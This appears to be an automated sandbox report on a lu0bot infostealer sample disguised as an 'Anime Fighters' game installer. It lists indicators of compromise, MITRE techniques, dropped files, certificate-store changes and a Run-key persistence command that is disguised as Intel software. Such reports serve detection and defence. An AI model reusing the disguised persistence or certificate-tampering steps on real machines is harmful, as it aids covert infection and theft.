lu0bot | c91c6c4c1162115c8d7f82f2d9f4098ee61fbe9051d3350b0a2f97fa2ce3e6f2

Resubmissions

02-09-2021 19:12

210902-xwla1aeefq 10

02-09-2021 19:09

210902-xtsbjabea9 8

Analysis

max time kernel
606s
max time network
609s
platform
windows7_x64
resource
win7-fr
submitted
02-09-2021 19:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anime-Fighters-Infin_734316524.exe
Size

3.9MB
MD5

bd2b73492acf20dec004360b1605032d
SHA1

60ddf3c107d94bbeb102a2d7ede945eb5edd2b35
SHA256

12b6272825140a15eabec58f97b49aed3ce5db7816a0b3c2674f6ae8746367ca
SHA512

dae236259e32a9e4b789f020dbd8082b376e3c2b56fd94523a44cf4b5a557f3661aeefc24b5605218ba0479ee1b9a8cb7b5c1df6c103673a99f13bc4210c90da

Score

10^/10

lu0bot discovery persistence stealer suricata trojan

Malware Config

Signatures

Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
trojan stealer lu0bot
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata

Blocklisted process makes network request 64 IoCs

flow	pid	Process
33	1780	MsiExec.exe
35	1780	MsiExec.exe
36	1780	MsiExec.exe
40	1780	MsiExec.exe
41	2336	mshta.exe
43	1780	MsiExec.exe
45	1780	MsiExec.exe
47	1780	MsiExec.exe
48	2460	cscript.exe
49	1780	MsiExec.exe
50	1780	MsiExec.exe
51	1780	MsiExec.exe
52	1780	MsiExec.exe
53	1780	MsiExec.exe
54	1780	MsiExec.exe
59	1780	MsiExec.exe
60	1780	MsiExec.exe
61	1780	MsiExec.exe
62	1780	MsiExec.exe
63	1780	MsiExec.exe
64	1780	MsiExec.exe
65	1780	MsiExec.exe
66	1780	MsiExec.exe
67	1780	MsiExec.exe
68	1780	MsiExec.exe
69	1780	MsiExec.exe
70	1780	MsiExec.exe
73	1780	MsiExec.exe
75	1780	MsiExec.exe
77	1780	MsiExec.exe
78	1780	MsiExec.exe
80	1780	MsiExec.exe
82	1780	MsiExec.exe
83	1780	MsiExec.exe
87	1780	MsiExec.exe
90	1780	MsiExec.exe
91	1780	MsiExec.exe
92	1780	MsiExec.exe
94	1780	MsiExec.exe
95	1780	MsiExec.exe
96	1780	MsiExec.exe
97	1780	MsiExec.exe
98	1780	MsiExec.exe
99	1780	MsiExec.exe
100	1780	MsiExec.exe
101	1780	MsiExec.exe
102	1780	MsiExec.exe
103	1780	MsiExec.exe
104	1780	MsiExec.exe
106	1780	MsiExec.exe
107	1780	MsiExec.exe
108	1780	MsiExec.exe
109	1780	MsiExec.exe
110	1780	MsiExec.exe
113	1780	MsiExec.exe
114	1780	MsiExec.exe
115	1780	MsiExec.exe
117	1780	MsiExec.exe
118	1780	MsiExec.exe
119	1780	MsiExec.exe
121	1780	MsiExec.exe
122	1780	MsiExec.exe
123	1780	MsiExec.exe
124	1780	MsiExec.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
1948	Anime-Fighters-Infin_734316524.tmp
1800	Expedita.exe
1784	11zeb2.exe
2028	99DEaZ.exe
2324	00731710590.exe
2608	node.exe
2788	00096575022.exe
2856	Garbage Cleaner.exe
3028	Garbage Cleaner.exe
2712	AdvancedWindowsManager.exe
2736	AdvancedWindowsManager.exe
2772	AdvancedWindowsManager.exe
2760	AdvancedWindowsManager.exe
4204	AdvancedWindowsManager.exe
5852	AdvancedWindowsManager.exe

Loads dropped DLL 55 IoCs

pid	Process
1992	Anime-Fighters-Infin_734316524.exe
1948	Anime-Fighters-Infin_734316524.tmp
1948	Anime-Fighters-Infin_734316524.tmp
1948	Anime-Fighters-Infin_734316524.tmp
1948	Anime-Fighters-Infin_734316524.tmp
1800	Expedita.exe
1800	Expedita.exe
1800	Expedita.exe
2028	99DEaZ.exe
2028	99DEaZ.exe
2028	99DEaZ.exe
1108	MsiExec.exe
1108	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
1780	MsiExec.exe
2028	99DEaZ.exe
1780	MsiExec.exe
1780	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1148	MsiExec.exe
1780	MsiExec.exe
2292	cmd.exe
2292	cmd.exe
2548	cscript.exe
2760	cmd.exe
2760	cmd.exe
1784	11zeb2.exe
2820	cmd.exe
3028	Garbage Cleaner.exe
3028	Garbage Cleaner.exe
2648	taskeng.exe
2648	taskeng.exe
2648	taskeng.exe
2720	Process not Found
2648	taskeng.exe
2748	Process not Found
2648	taskeng.exe
3060	Process not Found
2648	taskeng.exe
4184	Process not Found
4220	Process not Found
2648	taskeng.exe
5864	Process not Found

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2716	icacls.exe
6940	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\Intel Management Engine Components 2489498475 = "wscript.exe /t:30 /nologo /e:jscript \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\\Intel MEC 2740857950\" \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\" 1971215467"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	99DEaZ.exe
File opened (read-only)	\??\K:	99DEaZ.exe
File opened (read-only)	\??\M:	99DEaZ.exe
File opened (read-only)	\??\Q:	99DEaZ.exe
File opened (read-only)	\??\R:	99DEaZ.exe
File opened (read-only)	\??\T:	99DEaZ.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	99DEaZ.exe
File opened (read-only)	\??\Y:	99DEaZ.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	99DEaZ.exe
File opened (read-only)	\??\L:	99DEaZ.exe
File opened (read-only)	\??\O:	99DEaZ.exe
File opened (read-only)	\??\V:	99DEaZ.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	99DEaZ.exe
File opened (read-only)	\??\S:	99DEaZ.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	99DEaZ.exe
File opened (read-only)	\??\Z:	99DEaZ.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	99DEaZ.exe
File opened (read-only)	\??\W:	99DEaZ.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	99DEaZ.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	99DEaZ.exe
File opened (read-only)	\??\B:	99DEaZ.exe
File opened (read-only)	\??\I:	99DEaZ.exe
File opened (read-only)	\??\P:	99DEaZ.exe
File opened (read-only)	\??\U:	99DEaZ.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2856 set thread context of 3028	2856	Garbage Cleaner.exe	73

Drops file in Program Files directory 22 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Vel\voluptas\is-JK0HI.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\Vel\voluptas\is-SQPK4.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-952Q6.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-QEIM3.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-3O85E.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-HSGBI.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\Vel\magnam\Expedita.exe	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-KL4O4.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-43U5A.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-GE0MU.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-EUS12.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-C7J19.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-BQC28.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-6P78P.tmp	Anime-Fighters-Infin_734316524.tmp

Drops file in Windows directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSICD76.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID036.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID854.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA1A.tmp	msiexec.exe
File created	C:\Windows\Installer\f74c294.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC506.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC6B.tmp	msiexec.exe
File created	C:\Windows\Installer\f74c296.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC9F9.tmp	msiexec.exe
File created	C:\Windows\Installer\f74c298.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID749.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDAA7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDB15.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE1DA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f74c296.ipi	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f74c294.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC98B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2B6.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID739.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE258.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE538.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC861.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC8BF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICAE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICE22.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	00096575022.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	00096575022.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2296	tasklist.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2364	ipconfig.exe
2520	netstat.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2484	systeminfo.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1320	taskkill.exe
2908	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
7004	reg.exe
7016	reg.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99DEaZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Garbage Cleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Garbage Cleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99DEaZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	99DEaZ.exe
